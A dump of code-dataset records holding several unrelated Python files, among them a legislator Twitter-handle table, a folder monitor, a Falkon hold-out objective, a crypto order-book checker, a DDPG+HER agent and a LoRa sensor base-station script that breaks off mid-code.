'@RepStefanik',\n 'Katko, John': '@RepJohnKatko',\n 'Russell, Steve': '@RepRussell',\n 'Costello, Ryan': '@RepRyanCostello',\n 'Boyle, Brendan': '@CongBoyle',\n 'Ratcliffe, John': '@RepRatcliffe',\n 'Hurd, Will': '@hurdonthehill',\n 'Babin, Brian': '@RepBrianBabin',\n 'Love, Mia': '@repmialove',\n 'Beyer, Donald': '@repdonbeyer',\n 'Comstock, Barbara': '@RepComstock',\n 'Plaskett, Stacey': '@staceyplaskett',\n 'Newhouse, Dan': '@RepNewhouse',\n 'Grothman, Glenn': '@RepGrothman',\n 'Mooney, Alex': '@RepAlexMooney',\n 'Jenkins, Evan': '@RepEvanJenkins',\n 'Amata, Aumua': '@RepAmata',\n 'Sullivan, Dan': '@SenDanSullivan',\n 'Perdue, David': '@sendavidperdue',\n 'Ernst, Joni': '@SenJoniErnst',\n 'Tillis, Thom': '@senthomtillis',\n 'Rounds, Mike': '@SenatorRounds',\n 'Walker, Mark': '@RepMarkWalker',\n 'Sasse, Benjamin': '@SenSasse',\n 'Donovan, Daniel': '@RepDanDonovan',\n 'Kelly, Trent': '@reptrentkelly',\n 'LaHood, Darin': '@RepLaHood',\n 'Davidson, Warren': '@WarrenDavidson',\n 'Hanabusa, Colleen': '@RepHanabusa',\n 'Comer, James': '@KYComer',\n 'Evans, Dwight': '@RepDwightEvans',\n 'Harris, Kamala': '@SenKamalaHarris',\n 'Kennedy, John': '@SenJohnKennedy',\n 'Hassan, Margaret': '@Senatorhassan',\n 'Cortez Masto, Catherine': '@sencortezmasto',\n 'Schneider, Bradley': '@repschneider',\n 'Shea-Porter, Carol': '@repsheaporter',\n \"O'Halleran, Tom\": '@repohalleran',\n 'Biggs, Andy': '@RepAndyBiggsAZ',\n 'Khanna, Ro': '@RepRoKhanna',\n 'Panetta, Jimmy': '@RepJimmyPanetta',\n 'Carbajal, Salud': '@RepCarbajal',\n 'Barragan, Nanette': '@RepBarragan',\n 'Correa, J.': '@reploucorrea',\n 'Blunt Rochester, Lisa': '@RepBRochester',\n 'Gaetz, Matt': '@RepMattGaetz',\n 'Dunn, Neal': '@drnealdunnfl2',\n 'Rutherford, John': '@RepRutherfordFL',\n 'Lawson, Al': '@RepAlLawsonJr',\n 'Murphy, Stephanie': '@RepStephMurphy',\n 'Soto, Darren': '@RepDarrenSoto',\n 'Demings, Val': '@RepValDemings',\n 'Crist, Charlie': '@repcharliecrist',\n 'Mast, Brian': '@repbrianmast',\n 'Rooney, Francis': '@RepRooney',\n 'Ferguson, A.': '@RepDrewFerguson',\n 'Krishnamoorthi, Raja': '@congressmanraja',\n 'Banks, Jim': '@RepJimBanks',\n 'Hollingsworth, Trey': '@reptrey',\n 'Marshall, Roger': '@RepMarshall',\n 'Higgins, Clay': '@RepClayHiggins',\n 'Johnson, Mike': '@RepMikeJohnson',\n 'Brown, Anthony': '@RepAnthonyBrown',\n 'Raskin, Jamie': '@repraskin',\n 'Bergman, Jack': '@RepJackBergman',\n 'Mitchell, Paul': '@RepPaulMitchell',\n 'Lewis, Jason': '@RepJasonLewis',\n 'Budd, Ted': '@RepTedBudd',\n 'Bacon, Don': '@repdonbacon',\n 'Gottheimer, Josh': '@RepJoshG',\n 'Rosen, Jacky': '@repjackyrosen',\n 'Kihuen, Ruben': '@RepKihuen',\n 'Suozzi, Thomas': '@RepTomSuozzi',\n 'Espaillat, Adriano': '@RepEspaillat',\n 'Faso, John': '@RepJohnFaso',\n 'Tenney, Claudia': '@RepTenney',\n 'Fitzpatrick, Brian': '@repbrianfitz',\n 'Smucker, Lloyd': '@RepSmucker',\n 'Gonzalez-Colon, Jenniffer': '@repjenniffer',\n 'Kustoff, David': '@repdavidkustoff',\n 'Gonzalez, Vicente': '@RepGonzalez',\n 'Arrington, Jodey': '@RepArrington',\n 'Taylor, Scott': '@RepScottTaylor',\n 'McEachin, A.': '@RepMcEachin',\n 'Garrett, Thomas': '@Rep_Tom_Garrett',\n 'Jayapal, Pramila': '@RepJayapal',\n 'Gallagher, Mike': '@RepGallagher',\n 'Cheney, Liz': '@RepLizCheney',\n 'Strange, Luther': '@SenatorStrange',\n 'Estes, Ron': '@RepRonEstes'\n }","repo_name":"mbeaver502/CyberLawBot","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":31279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} 
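Editor's sketch (not part of the dataset record above): constants.py is a flat legislator-name -> Twitter-handle lookup table in which members without a known account map to None (e.g. 'Sablan, Gregorio'), so any consumer needs a None guard on every lookup. The snippet below is a minimal, self-contained illustration of that design choice; the name LEGISLATOR_HANDLES and the fallback message are illustrative stand-ins, with two entries copied verbatim from the record.
from typing import Optional

# Stand-in for the full name -> handle mapping in constants.py above.
# A None value is the record's own sentinel for "no known account".
LEGISLATOR_HANDLES = {
    'Ryan, Paul': '@SpeakerRyan',
    'Sablan, Gregorio': None,
}

def handle_for(member: str) -> Optional[str]:
    # dict.get returns None both for absent keys and for explicit None
    # values, so one falsy check covers "unknown member" and "no account".
    return LEGISLATOR_HANDLES.get(member)

for name in ('Ryan, Paul', 'Sablan, Gregorio', 'Doe, Jane'):
    handle = handle_for(name)
    print(name, '->', handle if handle else 'no handle on file')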
+{"seq_id":"24469774815","text":"import os\nimport time\nfrom pathlib import Path\nfrom watchdog.events import FileSystemEventHandler\nfrom watchdog.observers import Observer\nimport InvestigateFile\nimport RecordDetails\n\n\ndef get_file_extension(file_name):\n file_tup = os.path.splitext(file_name)\n return file_tup[1]\n\n\ndef get_file_name(src_path, wachdirectory):\n len_watch_dir_path = len(wachdirectory)\n len_event_src_path = len(src_path)\n watch_file = src_path[len_watch_dir_path:len_event_src_path]\n return watch_file\n\n\n# Creating class MyHandler which extends FileSystemEventHandler(Watchdog api class)\nclass MyHandler(FileSystemEventHandler):\n # Fetching watch folder from property file.\n watchDirectory = InvestigateFile.get_value_from_properties_file_by_key(\"WatchDIR\")\n # Below we are sorting the files by modified date\n sorted(Path(watchDirectory).iterdir(), key=os.path.getmtime, reverse=True)\n\n # Overriding methods from FileSystemEventHandler class on_modified and on_created\n def on_modified(self, event):\n file_path = event.src_path\n event_type = event.event_type\n # getting below last modified date and time\n # modified_date = time.ctime(os.path.getmtime(file_path))\n # print(file_path, \" is \", event_type, \" on \", modified_date)\n file_name = get_file_name(file_path, self.watchDirectory)\n fileStartsWith = InvestigateFile.get_value_from_properties_file_by_key(\"FileStartsWith\")\n if file_name.startswith(fileStartsWith):\n print(file_name, \" is \", event_type)\n InvestigateFile.read_log_file(file_path, event_type)\n\n def on_created(self, event):\n event_type = event.event_type\n file_path = event.src_path\n # getting created date time\n # create_date = time.ctime(os.path.getctime(event.src_path))\n # print(file_path, \" is \", event_type, \" on \", create_date)\n file_name = get_file_name(file_path, self.watchDirectory)\n # file_extension = get_file_extension(file_name)\n fileStartsWith = InvestigateFile.get_value_from_properties_file_by_key(\"FileStartsWith\")\n if file_name.startswith(fileStartsWith):\n if RecordDetails.last_ran_file_name == file_name:\n event_type = \"modified\"\n else:\n RecordDetails.log_last_running_time = \"\"\n print(file_name, \" is \", event_type)\n InvestigateFile.read_log_file(file_path, event_type)\n RecordDetails.last_ran_file_name = file_name\n\n\nevent_handler = MyHandler()\nobserver = Observer()\npath = InvestigateFile.get_value_from_properties_file_by_key(\"WatchDIR\")\nobserver.schedule(event_handler, path, recursive=False)\nobserver.start()\ntry:\n print(\"Started Monitoring Folder:\", path)\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()\n","repo_name":"gdputilties/FileMonitoring","sub_path":"MonitorFile.py","file_name":"MonitorFile.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24013558888","text":"from typing import Dict, Optional\n\nimport torch\n\nimport falkon.kernels\nfrom falkon.hopt.objectives.exact_objectives.utils import jittering_cholesky\nfrom falkon.hopt.objectives.objectives import HyperoptObjective\nfrom falkon.hopt.utils import get_scalar\n\n\nclass HoldOut(HyperoptObjective):\n def __init__(\n self,\n kernel: falkon.kernels.DiffKernel,\n centers_init: torch.Tensor,\n penalty_init: torch.Tensor,\n opt_centers: bool,\n opt_penalty: bool,\n val_pct: float,\n per_iter_split: bool,\n centers_transform: Optional[torch.distributions.Transform] = None,\n 
pen_transform: Optional[torch.distributions.Transform] = None,\n ):\n super().__init__(kernel, centers_init, penalty_init, opt_centers, opt_penalty, centers_transform, pen_transform)\n self.x_train, self.y_train = None, None\n self.losses: Optional[Dict[str, torch.Tensor]] = None\n self.per_iter_split = per_iter_split\n self.val_pct = val_pct\n self.tr_indices, self.val_indices = None, None\n\n def forward(self, X, Y):\n # X_tr, Y_tr are used for predictions. They contain the whole dataset (=retraining)\n self.x_train, self.y_train = X, Y\n if self.tr_indices is None or self.per_iter_split:\n num_val = int(X.shape[0] * self.val_pct)\n all_idx = torch.randperm(X.shape[0])\n self.val_indices = all_idx[:num_val]\n self.tr_indices = all_idx[num_val:]\n\n Xtr = X[self.tr_indices]\n Xval = X[self.val_indices]\n Ytr = Y[self.tr_indices]\n Yval = Y[self.val_indices]\n\n kmval = self.kernel(self.centers, Xval)\n alpha = self._calc_intermediate(Xtr, Ytr)\n val_preds = kmval.T @ alpha\n loss = torch.mean(torch.square(Yval - val_preds))\n\n self._save_losses(loss)\n return loss\n\n def predict(self, X):\n if self.x_train is None or self.y_train is None:\n raise RuntimeError(\"Call forward at least once before calling predict.\")\n with torch.autograd.no_grad():\n alpha = self._calc_intermediate(self.x_train, self.y_train)\n kms = self.kernel(self.centers, X)\n return kms.T @ alpha\n\n @property\n def train_pct(self):\n return 100.0 - self.val_pct\n\n def _calc_intermediate(self, X, Y):\n variance = self.penalty * X.shape[0]\n sqrt_var = torch.sqrt(variance)\n\n kmn = self.kernel(self.centers, X)\n kmm = self.kernel(self.centers, self.centers)\n L = jittering_cholesky(kmm) # L @ L.T = kmm\n # A = L^{-1} K_mn / (sqrt(n*pen))\n A = torch.linalg.solve_triangular(L, kmn, upper=False) / sqrt_var\n AAT = A @ A.T\n # B = A @ A.T + I\n B = AAT + torch.eye(AAT.shape[0], device=X.device, dtype=X.dtype)\n LB = jittering_cholesky(B) # LB @ LB.T = B\n AYtr = A @ Y\n c = torch.linalg.solve_triangular(LB, AYtr, upper=False) / sqrt_var\n\n tmp1 = torch.linalg.solve_triangular(LB.T, c, upper=True)\n alpha = torch.linalg.solve_triangular(L.T, tmp1, upper=True)\n return alpha\n\n def _save_losses(self, holdout):\n self.losses = {\n \"hold-out\": holdout.detach(),\n }\n\n def __repr__(self):\n return (\n f\"NystromHoldOut(\"\n f\"kernel={self.kernel}, \"\n f\"penalty={get_scalar(self.penalty)}, \"\n f\"num_centers={self.centers.shape[0]}, \"\n f\"val_pct={self.val_pct}, \"\n f\"per_iter_split={self.per_iter_split})\"\n )\n","repo_name":"FalkonML/falkon","sub_path":"falkon/hopt/objectives/exact_objectives/holdout.py","file_name":"holdout.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"6"} +{"seq_id":"34641409875","text":"import calculator\nimport time\nimport ccxt\n\nclass Box:\n #a node that can be imlanted on any computer, for each node on every computer you can divide the time of sample by using different IP's\n\n def __init__(self, enable_limit = False, usd_limit = 5, reverse = False, depth = 100, symbol = \"BTC/USDT\", enable_recursion= False):\n self.usd_limit = usd_limit\n self.enable_limit = enable_limit\n self.reverse = reverse\n self.depth = depth\n self.symbol = symbol\n self.inOrder = False\n self.enable_recursion = enable_recursion\n\n if(reverse):\n self.A = ccxt.kraken({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n self.B = ccxt.binance({\n 'enableRateLimit': True # 
this option enables the built-in rate limiter (no ip ban)\n })\n else:\n self.A = ccxt.binance({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n self.B = ccxt.kraken({\n 'enableRateLimit': True # this option enables the built-in rate limiter (no ip ban)\n })\n\n def run(self):\n\n #while(self.inOrder==False):\n bookA = self.A.fetch_order_book(self.symbol, self.depth)\n bookB = self.B.fetch_order_book(self.symbol, self.depth)\n\n asks = bookA[\"asks\"]\n bids = bookB[\"bids\"]\n\n results = calc.analyze(asks, bids)\n\n print(results)\n\n if(self.enable_recursion):\n time.sleep(6)\n self.run()\n\n def get_inOrder(self):#inOrder is true is currently in the middle of an order\n return self.get_inOrder\n\n def set_inOrder(self, bool):\n self.inOrder = bool\n\n\ncalc = calculator.calculator()\n \n","repo_name":"officialnico/arb","sub_path":"Box.py","file_name":"Box.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"70292634429","text":"import torch\nimport os\nimport numpy as np\nimport time\nfrom models.actor import VanillaActor, PointnetMLP\nfrom models.critic import VanillaCritic, PointnetMLP_critic\nfrom rl_modules.replay_buffer import replay_buffer\nfrom rl_modules.base_agent import base_agent\nfrom rl_modules.normalizer import normalizer\nfrom rl_modules.her import her_sampler\nfrom rl_modules.utils import *\n\n\"\"\"\nddpg with HER\n\"\"\"\n\n\nclass ddpg_agent(base_agent):\n def __init__(self, args, dummy_env, env_params, policy_params):\n super().__init__(args, env_params)\n self.agent_type = 'ddpg_her'\n # create new run or resume from previous\n self._fresh_or_resume()\n self.args.flat2dict = dummy_env.flat2dict\n # sampling function (use her or not)\n # assuming all envs have the same compute reward method\n her_module = her_sampler(\n self.args.replay_strategy, self.args.replay_k, dummy_env.compute_reward)\n self.sample_func = her_module.sample_her_transitions\n self.buffers = None\n # create new modules or resumed from checkpoint\n if self.resume_training and self.args.eval and self.args.load_cycle is not None: # load actor only for eval\n self.actor_network = self.ckpt_dict['actor_network']\n self.o_norm = self.ckpt_dict['o_norm']\n self.g_norm = self.ckpt_dict['g_norm']\n self.actor_network.args = self.args\n self.o_norm.args = self.args\n self.g_norm.args = self.args\n elif self.resume_training: # load everything for resuming training\n self.actor_network = self.ckpt_dict['actor_network']\n self.actor_target_network = self.ckpt_dict['actor_target_network']\n self.critic_network = self.ckpt_dict['critic_network']\n self.critic_target_network = self.ckpt_dict['critic_target_network']\n self.actor_optim = self.ckpt_dict['actor_optim']\n self.critic_optim = self.ckpt_dict['critic_optim']\n self.o_norm = self.ckpt_dict['o_norm']\n self.g_norm = self.ckpt_dict['g_norm']\n self.actor_network.args = self.args\n self.actor_target_network.args = self.args\n self.critic_network.args = self.args\n self.critic_target_network.args = self.args\n self.o_norm.args = self.args\n self.g_norm.args = self.args\n if 'buffers' in self.ckpt_dict:\n self.buffers = self.ckpt_dict['buffers']\n else:\n assert self.args.eval\n else:\n self.actor_func = PointnetMLP if args.point_cloud else VanillaActor\n self.critic_func = PointnetMLP_critic if args.point_cloud else VanillaCritic\n self.actor_network = self.actor_func(**policy_params)\n self.critic_network = 
self.critic_func(**policy_params)\n self.actor_target_network = self.actor_func(**policy_params)\n self.actor_target_network.load_state_dict(\n self.actor_network.state_dict())\n self.critic_target_network = self.critic_func(**policy_params)\n self.critic_target_network.load_state_dict(\n self.critic_network.state_dict())\n if self.args.point_cloud:\n self._load_pointnet()\n # create the optimizer\n self.actor_optim = torch.optim.Adam(\n self.actor_network.parameters(), lr=self.args.lr_actor)\n self.critic_optim = torch.optim.Adam(\n self.critic_network.parameters(), lr=self.args.lr_critic)\n # use merged normalizer for all envs\n self.o_norm = normalizer(\n size=env_params['obs_to_normalize'], default_clip_range=self.args.clip_range, args=args)\n self.g_norm = normalizer(\n size=env_params['goal'], default_clip_range=self.args.clip_range, args=args)\n # create replay buffer\n if not self.args.eval and self.buffers is None:\n self.buffers = dict()\n for env_name in self.args.train_names:\n self.buffers[env_name] = replay_buffer(self.env_params['max_timesteps'], self.env_params['obs'], self.env_params['goal'],\n self.env_params['action'], self.args.buffer_size, env_name=env_name,\n sample_func=self.sample_func)\n self.device = torch.device(\"cuda\" if not self.args.no_cuda else \"cpu\")\n # if use gpu\n if self.args.eval:\n if not self.args.no_cuda:\n self.actor_network.cuda()\n self.actor_network.eval()\n else:\n if not self.args.no_cuda:\n self.actor_network.cuda()\n self.critic_network.cuda()\n self.actor_target_network.cuda()\n self.critic_target_network.cuda()\n self.actor_network.eval()\n self.actor_target_network.eval()\n self.critic_network.eval()\n self.critic_target_network.eval()\n\n def learn(self, log_callback=None):\n \"\"\"\n train the network\n\n \"\"\"\n # start to collect samples\n assert self.args.num_rollouts % self.args.num_parallel_envs == 0\n if self.resume_training:\n self.total_steps = self.ckpt_dict['total_steps']\n start_cycle = self.ckpt_dict['current_cycle'] + 1\n else:\n self.total_steps = 0\n start_cycle = 0\n for cycle in range(start_cycle, self.args.n_cycles):\n self.current_cycle = cycle\n cycle_start = time.time()\n logged_dict = dict()\n sampling_start = time.time()\n # collect data ==================================================================\n train_env_reward, train_env_sr, train_env_distance = [], [], []\n # print('\\n### Start collecting samples ###\\n')\n mb_obs, mb_ag, mb_g, mb_actions, total_success_rate_per_env, total_reward_per_env, total_distance_per_env, _ = collect_experiences(self.train_envs, self.args.num_rollouts,\n self.env_params[\n 'max_timesteps'], self.actor_network,\n self.o_norm, self.g_norm, self.env_params,\n video_count=0, cuda=not self.args.no_cuda,\n action_proc_func=self._select_actions,\n vec_env_names=self.train_vec_env_names, point_cloud=self.args.point_cloud)\n # store the episodes\n assert self.args.num_rollouts == len(self.train_vec_env_names)\n assert mb_obs.shape[0] == self.args.num_rollouts\n for i, env_name in enumerate(self.train_vec_env_names):\n self.buffers[env_name].store_episode(\n [mb_obs[i, :, :], mb_ag[i, :, :], mb_g[i, :, :], mb_actions[i, :, :]])\n # update normalizer\n self._update_normalizer([mb_obs, mb_ag, mb_g, mb_actions])\n # print to console =================================================\n print('== [EXP{:04d}:C{:03d}] success %: {:.3f}, reward: {:.2f}, dist: {:.3f}, env time: {:.2f} s across {} episodes'.format(self.args.expID, cycle,\n total_success_rate_per_env['average'], 
total_reward_per_env['average'], total_distance_per_env['average'], time.time() - sampling_start, mb_actions.shape[0]))\n # accumulate metrics\n train_env_reward.append(total_reward_per_env['average'])\n train_env_distance.append(total_distance_per_env['average'])\n train_env_sr.append(total_success_rate_per_env['average'])\n self.total_steps += self.args.num_rollouts * \\\n self.env_params['max_timesteps']\n logged_dict['avg_train_reward_train'] = np.mean(train_env_reward)\n logged_dict['avg_train_dist_train'] = np.mean(train_env_distance)\n logged_dict['avg_train_sr_train'] = np.mean(train_env_sr)\n logged_dict['total_env_steps'] = self.total_steps\n # start training ==================================================================\n training_start = time.time()\n update_infos = []\n num_multi_batch = self.args.n_batches // len(self.args.train_names)\n for b in range(num_multi_batch): # each iter trains all envs once\n # train the network\n update_info = self._update_network()\n update_infos.append(update_info)\n # average and log training metrics\n logged_dict.update(get_avg_values_across_batches(update_infos))\n # update targets\n self._soft_update_target_network(\n self.actor_target_network, self.actor_network)\n self._soft_update_target_network(\n self.critic_target_network, self.critic_network)\n logged_dict['fps'] = self.args.num_rollouts * \\\n self.env_params['max_timesteps'] // (time.time() - cycle_start)\n print('{:03d}:{} -- actor/l: {:.3f}, critic/l: {:.3f}, steps: {:.3e}, Cycle FPS: {}, train time: {:.2f} s -----\\n'.format(self.args.expID,\n cycle, logged_dict['actor_loss'], logged_dict['critic_loss'], self.total_steps, logged_dict['fps'], time.time() - training_start))\n # start to do the evaluation\n if self.args.eval_freq > 0 and (cycle % self.args.eval_freq == 0 or cycle == 0 or cycle == self.args.n_cycles - 1):\n logged_dict = self._eval_network(logged_dict)\n if log_callback is not None:\n log_callback(logged_dict)\n\n def _select_actions(self, pi):\n \"\"\"this function will choose action for the agent and do the exploration\"\"\"\n action = pi.cpu().numpy().squeeze()\n # add the gaussian\n action += self.args.noise_eps * \\\n self.env_params['action_max'] * np.random.randn(*action.shape)\n action = np.clip(\n action, -self.env_params['action_max'], self.env_params['action_max'])\n # random actions...\n random_actions = np.random.uniform(low=-self.env_params['action_max'], high=self.env_params['action_max'],\n size=self.env_params['action'])\n # choose if use the random actions\n action += np.random.binomial(1, self.args.random_eps,\n 1)[0] * (random_actions - action)\n return action\n\n def _update_normalizer(self, episode_batch):\n \"\"\"update the normalizer\"\"\"\n mb_obs, mb_ag, mb_g, mb_actions = episode_batch\n mb_ag_next = mb_ag[:, 1:, :]\n # get the number of normalization transitions\n num_transitions = mb_actions.shape[1]\n # create the new buffer to store them\n buffer_temp = {'obs': mb_obs,\n 'ag': mb_ag,\n 'g': mb_g,\n 'actions': mb_actions,\n 'ag_next': mb_ag_next,\n }\n transitions = self.sample_func(buffer_temp, num_transitions)\n # pre process the obs and g\n transitions['obs'], transitions['g'] = preproc_og(\n transitions['obs'], transitions['g'], clip_obs=self.args.clip_obs)\n # update\n self.o_norm.update(transitions['obs'])\n self.g_norm.update(transitions['g'])\n # recompute the stats\n self.o_norm.recompute_stats()\n self.g_norm.recompute_stats()\n\n def _soft_update_target_network(self, target, source):\n \"\"\"update targets\"\"\"\n for 
target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(\n (1 - self.args.polyak) * param.data + self.args.polyak * target_param.data)\n\n def _get_train_data(self, env_name):\n # sample the episodes\n transitions = self.buffers[env_name].sample(self.args.batch_size)\n # pre-process the observation and goal\n o, o_next, g = transitions['obs'], transitions['obs_next'], transitions['g']\n transitions['obs'], transitions['g'] = preproc_og(\n o, g, clip_obs=self.args.clip_obs)\n transitions['obs_next'], transitions['g_next'] = preproc_og(\n o_next, g, clip_obs=self.args.clip_obs)\n # start to do the update\n obs_norm = self.o_norm.normalize(transitions['obs'])\n g_norm = self.g_norm.normalize(transitions['g'])\n inputs_norm = np.concatenate([obs_norm, g_norm], axis=-1)\n obs_next_norm = self.o_norm.normalize(transitions['obs_next'])\n g_next_norm = self.g_norm.normalize(transitions['g_next'])\n inputs_next_norm = np.concatenate(\n [obs_next_norm, g_next_norm], axis=-1)\n # transfer them into the tensor\n inputs_norm_tensor = torch.tensor(\n inputs_norm, dtype=torch.float32, device=self.device)\n inputs_next_norm_tensor = torch.tensor(\n inputs_next_norm, dtype=torch.float32, device=self.device)\n actions_tensor = torch.tensor(\n transitions['actions'], dtype=torch.float32, device=self.device)\n r_tensor = torch.tensor(\n transitions['r'], dtype=torch.float32, device=self.device)\n return inputs_norm_tensor, inputs_next_norm_tensor, actions_tensor, r_tensor\n\n # update the network\n def _update_network(self):\n # set models to train mode\n self.actor_network.train()\n self.actor_target_network.train()\n self.critic_network.train()\n self.critic_target_network.train()\n # train each object\n critic_losses, actor_losses = [], []\n self.actor_optim.zero_grad()\n self.critic_optim.zero_grad()\n for i, env_name in enumerate(self.args.train_names):\n inputs_norm_tensor, inputs_next_norm_tensor, actions_tensor, r_tensor = self._get_train_data(\n env_name)\n # calculate the target Q value function\n with torch.no_grad():\n # concatenate the stuffs\n actions_next = self.actor_target_network(\n inputs_next_norm_tensor)\n q_next_value = self.critic_target_network(\n inputs_next_norm_tensor, actions_next)\n q_next_value = q_next_value.detach()\n target_q_value = r_tensor + self.args.gamma * q_next_value\n target_q_value = target_q_value.detach()\n # clip the q value\n clip_return = 1 / (1 - self.args.gamma)\n target_q_value = torch.clamp(target_q_value, -clip_return, 0)\n # the q loss\n real_q_value = self.critic_network(\n inputs_norm_tensor, actions_tensor)\n critic_loss = (target_q_value - real_q_value).pow(2).mean()\n critic_losses.append(critic_loss)\n # the actor loss\n actions_real = self.actor_network(inputs_norm_tensor)\n actor_loss = - \\\n self.critic_network(inputs_norm_tensor, actions_real).mean()\n action_l2_norm = (\n actions_real / self.env_params['action_max']).pow(2).mean()\n actor_loss += self.args.action_l2 * action_l2_norm\n actor_losses.append(actor_loss)\n actor_loss = sum(actor_losses)\n critic_loss = sum(critic_losses)\n self.actor_optim.zero_grad()\n actor_loss.backward()\n self.actor_optim.step()\n # update the critic_network\n self.critic_optim.zero_grad()\n critic_loss.backward()\n self.critic_optim.step()\n\n # set models to eval mode\n self.actor_network.eval()\n self.actor_target_network.eval()\n self.critic_network.eval()\n self.critic_target_network.eval()\n\n update_info = dict(actor_loss=actor_loss, critic_loss=critic_loss)\n 
return update_info\n\n def _save_ckpt(self, exp_path):\n # save general checkpoint for training resume\n general_checkpoint = dict(actor_network=self.actor_network,\n actor_target_network=self.actor_target_network,\n critic_network=self.critic_network,\n critic_target_network=self.critic_target_network,\n actor_optim=self.actor_optim,\n critic_optim=self.critic_optim,\n o_norm=self.o_norm,\n g_norm=self.g_norm,\n current_cycle=self.current_cycle,\n total_steps=self.total_steps,\n args=self.args)\n if not self.args.no_save_buffer:\n general_checkpoint['buffers'] = self.buffers\n general_save_path = os.path.join(\n exp_path, '{}_general_{:04d}.tar'.format(self.agent_type, self.args.expID))\n torch.save(general_checkpoint, general_save_path)\n print('** general checkpoint saved to {}'.format(general_save_path))\n\n eval_checkpoint = dict(actor_network=self.actor_network,\n o_norm=self.o_norm,\n g_norm=self.g_norm)\n eval_save_path = os.path.join(exp_path, '{}_eval_{:04d}_J{}.tar'.format(\n self.agent_type, self.args.expID, self.current_cycle))\n torch.save(eval_checkpoint, eval_save_path)\n print('** eval checkpoint saved to {}'.format(eval_save_path))\n\n def _load_pointnet(self):\n pointnet_load_path = './dex_logs/pointnet/pointnet_{:04d}'.format(\n self.args.pointnet_load_path)\n fname = 'feat_model.pth'\n pretrain_weights = torch.load(os.path.join(pointnet_load_path, fname))\n for nn_name in ['actor_network', 'critic_network', 'actor_target_network', 'critic_target_network']:\n nn = getattr(self, nn_name)\n nn.features_net.pointnet.load_state_dict(pretrain_weights)\n if not self.args.finetune_pointnet:\n for name, p in nn.features_net.pointnet.named_parameters():\n p.requires_grad = False\n print('*** successfully loaded pointnet feature model ***')\n","repo_name":"huangwl18/geometry-dex","sub_path":"rl_modules/ddpg_agent.py","file_name":"ddpg_agent.py","file_ext":"py","file_size_in_byte":19162,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"6"} +{"seq_id":"42992991012","text":"###Author: Jennifer Brana\n###Last modification: 4/25/2023\n\n\n# Import Python System Libraries\nimport time\n# Import Blinka Libraries\nimport busio\nfrom digitalio import DigitalInOut, Direction, Pull\nimport board\n# Import the SSD1306 module.\nimport adafruit_ssd1306\n# Import RFM9x\nimport adafruit_rfm9x\n\nimport time\nimport busio\nimport digitalio\nimport board\nimport time\nimport os\nimport sys\nimport checksum\n\nsys.path.insert(0,'/home/bagel1/TeamLiftCSWaterProject/CloudUpload')\nfrom datetime import datetime\nfrom datapusher import sendFile,getSpreadsheetAck\nfrom emailsender import sendEmail,getEmailAck\nfrom sendUnacked import sendUnackedUpload\n\n# Delay between sending radio data, in minutes\nSENSOR_SEND_DELAY = 1\n\n# Create the I2C interface.\ni2c = busio.I2C(board.SCL, board.SDA)\n\n# Create library object using our Bus I2C port\n#bme280 = adafruit_bme280.Adafruit_BME280_I2C(i2c)\n\n##Define buttons for testing\n# Button A\nbtnA = DigitalInOut(board.D5)\nbtnA.direction = Direction.INPUT\nbtnA.pull = Pull.UP\n\n# Button B\nbtnB = DigitalInOut(board.D6)\nbtnB.direction = Direction.INPUT\nbtnB.pull = Pull.UP\n\n# Button C\nbtnC = DigitalInOut(board.D12)\nbtnC.direction = Direction.INPUT\nbtnC.pull = Pull.UP\n\n\n# 128x32 OLED Display\nreset_pin = DigitalInOut(board.D4)\ndisplay = adafruit_ssd1306.SSD1306_I2C(128, 32, i2c, reset=reset_pin)\n# Clear the display.\ndisplay.fill(0)\ndisplay.show()\nwidth = display.width\nheight = display.height\n\n#define 
radio frequency\nRADIO_FREQ_MHZ = 915.0\n\n# Configure LoRa Radio\nCS = DigitalInOut(board.CE1)\nRESET = DigitalInOut(board.D25)\nspi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)\nrfm9x = adafruit_rfm9x.RFM9x(spi, CS, RESET, RADIO_FREQ_MHZ)\n\n#set transmit power to max\nrfm9x.tx_power = 23\n\nprev_packet = None\n\n# Define the onboard LED\nLED = digitalio.DigitalInOut(board.D13)\nLED.direction = digitalio.Direction.OUTPUT\n\n# create empty packet for sensor data\npacket = bytearray(16)\n\n#start_time = time.monotonic()\n#elapsed_time = time.monotonic() - start_time\n\n\n \n\ntime_string = str(datetime.now().strftime(\"%m-%d-%Y-%H-%M-%S\")) + \".txt\"\n#startTime interval is the start of the timer's timeWindow\nstartIntervalTime = time.perf_counter()\n#the time window between successive uploads to the spreadsheets and email cloud\nfileBackupFrequency = 30\nstartTimeSend = time.perf_counter()\n#the time window between sending the adjustment time to the Field RTC\ntimeSendFrequency = 10\nwhile True:\n endIntervalTime = time.perf_counter()\n endTimeSend = time.perf_counter()\n \n adjustTime = datetime.now().strftime(\"%m-%d-%Y-%H-%M-%S\")\n rfm9x.send(bytearray(adjustTime,'UTF-8'))\n #the if statement over a timer delay, after a certain amount of time has passed, to upload to cloud\n if((endIntervalTime- startIntervalTime) > fileBackupFrequency):\n \n\n time_string = str(datetime.now().strftime(\"%m-%d-%Y-%H-%M-%S\")) + \".txt\"\n base_filepath = \"../CloudUpload/\"+time_string\n \n #copies aggregate data textfile to timestamped texfile \n os.system(\"cp ../CloudUpload/agg_data.txt \" + base_filepath);\n os.system(\"echo -n '' > ../CloudUpload/agg_data.txt\")\n \n #the following code sends the data to the cloud via an email, and by sending it to the spreadsheet\n #the boolean value for whether the upload was acknowledged, is retreived \n isEmailAcked = False\n isSpreadsheetAcked = False\n try:\n \n sendEmail(base_filepath)\n time.sleep(2)\n isEmailAcked = getEmailAck(base_filepath)\n except BaseException as k:\n print(k)\n \n try:\n sendFile(base_filepath)\n isSpreadsheetAcked = 